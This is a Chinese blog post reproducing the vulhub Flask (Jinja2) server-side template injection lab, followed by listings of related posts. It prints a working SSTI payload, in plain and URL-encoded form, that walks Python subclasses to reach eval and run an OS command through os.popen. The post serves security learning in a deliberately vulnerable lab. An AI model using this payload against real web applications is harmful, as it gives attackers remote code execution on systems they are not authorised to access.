【vulhub】flask

已于 2022-05-02 12:43:06 修改
阅读量175 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: flask 安全
于 2022-05-02 12:42:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haoaaao/article/details/124539396
版权

0x00 ssti(服务端模板注入漏洞)

1、简介

        Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。

        其中采用jinja2模板引擎传递参数,在书写不规范的时候会发生jinja模板语法的注入命令执行

2、搭建

3、复现

访问http://your-ip/?name={{233*233}},得到54289,说明SSTI漏洞存在。 

获取eval函数并执行任意python代码的官方POC:(转换为url格式)

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D

haoaaao
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2187
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
Flask(Jinja2) 服务端模板注入漏洞
浅笑996的博客
12-11 1298
原理 参考文章: https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf http://rickgray.me/use-python-features-to-execute-arbitrary-codes-i...
Vulnhub flask(SSTI)漏洞复现
qq_69209270的博客
09-23 292
Vulnhub flask(SSTI)漏洞复现
Vulhub Flask SSTI漏洞复现
CyhDl666的博客
03-26 983
文章目录环境搭建漏洞复现python3python2CTFSHOWWEB361WEB362WEB363 环境搭建 首先利用docker搭建好环境 docker-compose up -d docker ps查看搭建的端口:8000 漏洞复现 开始复现 flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下 题目源码 from flask import Flask, request from jinja2 import Template app = Flask(__name__)
vulhub漏洞复现十五_flask
weixin_44193247的博客
01-26 1282
vulhub漏洞复现练习篇
Flask(Jinja2)服务端模板注入漏洞——vulhub/flack/ssti
Stephen Wolf
10-31 1510
一、服务端模板注入漏洞 简述: 服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。 二、利用搭的vulhub靶机漏洞复现 1、service docker start //进入虚拟机后开启docker服...
flask
06-15
Flask 是一个轻量级的Web服务程序框架,基于Python编写,被广泛应用于构建小型到中型的Web应用。它的核心设计理念是“微”,强调模块化和可扩展性,允许开发者根据需求选择合适的扩展来增强功能,而不会带来不必要的...
flask socketio简单示例
最新发布
04-14
Flask-SocketIO是一个Python库,它将流行的Socket.IO库与轻量级Web框架Flask集成,使得在Web应用中实现实时双向通信成为可能。这个"flask_socket_test"压缩包很可能包含了一个简单的示例项目,展示了如何在Flask应用...
FlaskWeb开发
11-09
本书共分三部分,全面介绍如何基于 Python 微框架 Flask 进行 Web 开发。第一部分是 Flask 简介,介绍使用 Flask 框架及扩展开发 Web 程序的必备基础知识 ;第二部分则给出一个实例,真 正带领大家一步步开发完整的...
flask 安装
01-20
Python +FLask 环境搭建
Flask v2.0 中文文档
03-29
**Flask v2.0 中文文档概述** Flask 是一个轻量级的 Python Web 开发框架,基于 WSGI 协议。它以其简洁、灵活的架构深受开发者喜爱,适合构建小型到中等规模的 Web 应用。Flask v2.0 是该框架的一个重要版本,引入...
SSTI模板注入漏洞(vulhub 复现)
weixin_74790320的博客
02-18 1287
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,,模板引擎会提供一套生成html代码的程序,,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。模板引擎也会提供沙,但是可以用简而言之我的理解是模板引擎的关键就是只需要用户提供数据给模板便可以生成前端html页面,模板引擎有一定的防范机制,但是可以利用一定技术去绕过破解。
SSTI---总结
wwwwyyyrre的博客
06-12 2329
1)过滤[]和.只过滤[]pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。若.也被过滤,使用原生JinJa2函数|attr()将request.__class__改成request|attr("__class__")(2)过滤_利用request.args属性将其中的request.args改为request.values则利用post的方式进行传参(3)关键字过滤base64编码绕过__getattribute__使用实例访问属性时,调用该方法。
flask 起服务 、访问
weixin_41642203的博客
10-28 446
【代码】flask 起服务 、访问。
解读2017-08-10发布的几个安全漏洞
weixin_34268579的博客
08-20 390
标签 PostgreSQL , 安全漏洞 , CVE-2017-7546 , CVE-2017-7547 , CVE-2017-7548 背景 PostgreSQL 社区于08-10发布了新版本,修复了三个安全漏洞。 https://www.postgresql.org/about/news/1772/ CVE-2017-7546: Empty...
Flask(Jinja2)服务端模板注入漏洞(SSTI)整理
qq_46145027的博客
04-19 1300
整理一下Flask框架下的SSTI漏洞相关知识
渗透技术学习之二--docker搭建vulhub靶场进行nginx服务漏洞分析
阿党的专栏
03-09 1340
docker搭建vulhub靶场进行nginx服务漏洞分析
利用Vulnhub复现漏洞 - Flask(Jinja2) 服务端模板注入漏洞
JiangBuLiu的博客
07-08 1115
Flask(Jinja2) 服务端模板注入漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/flask/ssti/ 漏洞原理 https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-In...
vulhub靶场教程 flask/ssti
12-09
这次我们来讨论vulhub靶场中的一个特定教程:flask/ssti。 在flask/ssti教程中,我们将学习到的是Flask应用程序中的服务器端模板注入(Server-side Template Injection, SSTI)漏洞。这种漏洞的出现是由于Flask应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

haoaaao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值